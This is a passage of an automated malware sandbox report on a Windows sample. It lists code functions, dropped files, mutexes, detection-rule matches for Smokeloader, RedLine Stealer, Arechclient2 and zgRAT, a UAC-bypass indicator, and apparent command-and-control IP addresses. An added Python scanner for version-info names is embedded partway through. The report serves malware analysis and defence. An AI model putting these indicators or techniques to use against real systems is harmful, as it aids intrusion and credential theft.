Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC11980 2_2_6BC11980
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD1990 2_2_6BCD1990
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC7F960 2_2_6BC7F960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCBD960 2_2_6BCBD960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD4F900 2_2_6BD4F900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB5920 2_2_6BCB5920
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC9F8C0 2_2_6BC9F8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC0D8E0 2_2_6BC0D8E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC338E0 2_2_6BC338E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD5B8F0 2_2_6BD5B8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDF8F0 2_2_6BCDF8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD3840 2_2_6BCD3840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC5D810 2_2_6BC5D810
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD1DFC0 2_2_6BD1DFC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD83FC0 2_2_6BD83FC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCABFF0 2_2_6BCABFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC21F90 2_2_6BC21F90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF5F30 2_2_6BBF5F30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC35F20 2_2_6BC35F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD57F20 2_2_6BD57F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC23EC0 2_2_6BC23EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD5BE70 2_2_6BD5BE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD85E60 2_2_6BD85E60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD0DE10 2_2_6BD0DE10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD1DC0 2_2_6BCD1DC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF3D80 2_2_6BBF3D80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD49D90 2_2_6BD49D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0020F840 3_2_0020F840
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001F4060 3_2_001F4060
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00216130 3_2_00216130
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001F2120 3_2_001F2120
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0020B150 3_2_0020B150
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00249A00 3_2_00249A00
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0023CAA0 3_2_0023CAA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00204390 3_2_00204390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00210390 3_2_00210390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0021FC10 3_2_0021FC10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001FD570 3_2_001FD570
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00245550 3_2_00245550
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_002496E0 3_2_002496E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_002166F0 3_2_002166F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001FA6F0 3_2_001FA6F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_001F37B0 3_2_001F37B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C804D8F 3_2_6C804D8F
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C803D16 3_2_6C803D16
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C81371C 3_2_6C81371C
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C77D24D 3_2_6C77D24D
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BD8DAE0 appears 67 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BC5C5E0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BD809D0 appears 282 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BC23620 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BC29B10 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BD39F30 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: String function: 6BD8D930 appears 54 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 036736F8 appears 184 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 03697A73 appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 03679F27 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 03671D46 appears 44 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: String function: 03671BE3 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 001F1900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 001F14F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 001F1310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 00379D36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 6C804701 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 001F1930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: String function: 6C806320 appears 31 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968
Source: sx8RE6LbG0.exe, 00000000.00000003.2075830262.0000000003795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071578865.00000000037B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070408708.0000000003788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001DB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070439016.0000000003799000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073990551.000000000378B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2094919127.00000000037BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2423173870.0000000001A1D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075245239.0000000003795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2076626113.00000000037DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075390741.000000000379E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073925424.0000000003782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075093112.0000000003787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070109629.0000000003782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073613131.00000000037A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073192567.0000000003795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073415349.000000000379C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073816464.0000000003780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2424663925.0000000003749000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071977209.00000000037A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2077142039.00000000037B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070164179.000000000379F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071838564.0000000003795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
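The OriginalFilename findings above come from scanning the process's memory dumps for VS_VERSIONINFO string entries and comparing the embedded name with the file that is actually running: an image that calls itself MsMpLics.dll or Firezer0 while executing as sx8RE6LbG0.exe is a second PE (the unpacked or injected stage) living inside the process. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It scans a raw memory buffer for the documented VS_VERSIONINFO String layout (WORD wLength, WORD wValueLength, WORD wType, NUL-terminated UTF-16 key, at most one WORD of DWORD padding, NUL-terminated UTF-16 value) and reports every OriginalFilename that does not match the on-disk name; the buffer it scans is constructed inline to contain the two names seen in this report and is not real dump data.

```python
import struct

KEY = "OriginalFilename".encode("utf-16-le")


def _string_entry(key: str, value: str) -> bytes:
    """Build one VS_VERSIONINFO String entry (test-data helper, not a parser)."""
    body = key.encode("utf-16-le") + b"\x00\x00"
    if (6 + len(body)) % 4:                 # Value starts on a DWORD boundary
        body += b"\x00\x00"
    body += value.encode("utf-16-le") + b"\x00\x00"
    # wLength, wValueLength (WCHARs incl. NUL), wType=1 (text)
    entry = struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body
    return entry + b"\x00\x00" * (len(entry) % 4 // 2)   # pad to next DWORD


# Constructed memory dump: version blocks of two images, one key with an empty
# value (as in the "OriginalFilename vs" hits above) and one ASCII-only copy of
# the key that is not a version-info entry at all.
SAMPLE_DUMP = (
    b"\x00" * 8
    + _string_entry("ProductName", "Windows Defender")  # neighbouring entry
    + _string_entry("OriginalFilename", "MsMpLics.dll")
    + _string_entry("OriginalFilename", "")             # empty value: dropped
    + b"OriginalFilename" + b"\x00" * 6                 # ASCII hit: ignored
    + _string_entry("OriginalFilename", "Firezer0")
)


def _read_wide(blob: bytes, off: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at off."""
    end = off
    while end + 1 < len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    return blob[off:end].decode("utf-16-le", errors="replace")


def extract_original_filenames(blob: bytes) -> list[str]:
    """Return every non-empty OriginalFilename value in the blob, in order."""
    found, pos = [], 0
    while (i := blob.find(KEY, pos)) >= 0:
        off = i + len(KEY)
        pos = off
        if blob[off:off + 2] != b"\x00\x00":   # key must be NUL-terminated
            continue
        off += 2
        if blob[off:off + 2] == b"\x00\x00":   # at most one WORD of padding
            off += 2
        value = _read_wide(blob, off)
        if value:
            found.append(value)
    return found


def name_mismatches(blob: bytes, on_disk_name: str) -> list[str]:
    """OriginalFilename values that disagree with the file name on disk."""
    return [n for n in extract_original_filenames(blob)
            if n.lower() != on_disk_name.lower()]


if __name__ == "__main__":
    for name in name_mismatches(SAMPLE_DUMP, "sx8RE6LbG0.exe"):
        print(f"OriginalFilename{name} vs sx8RE6LbG0.exe")
```

Two caveats when reading the report lines themselves: the sandbox's string extractor evidently runs the key and value together and drags in the following bytes, which is where the "j%" suffix on the MsMpLics.dll hits comes from, whereas this scanner stops at the value's NUL and returns the clean name; and the hits with nothing after the key (OriginalFilename, \OriginalFileName, OriginalFilenameL) carry no value and are noise, which the scanner discards by requiring a NUL-terminated UTF-16 key and a non-empty value.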
Source: sx8RE6LbG0.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, -Module-.cs Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@44/79@10/11
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 2_2_6BC60300
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0022D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8, 3_2_0022D660
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_01CE678E CreateToolhelp32Snapshot,Module32First, 0_2_01CE678E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar, 0_2_0042628B
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_00208040 LoadResource,LockResource,SizeofResource, 3_2_00208040
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3664
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe
Source: Yara match File source: 6.0.u2ts.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2151539522.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2152517615.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe, type: DROPPED
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: two 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: two 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: two 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: Installed 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: Installed 0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Command line argument: 185.172.128.228 0_2_00424A0E
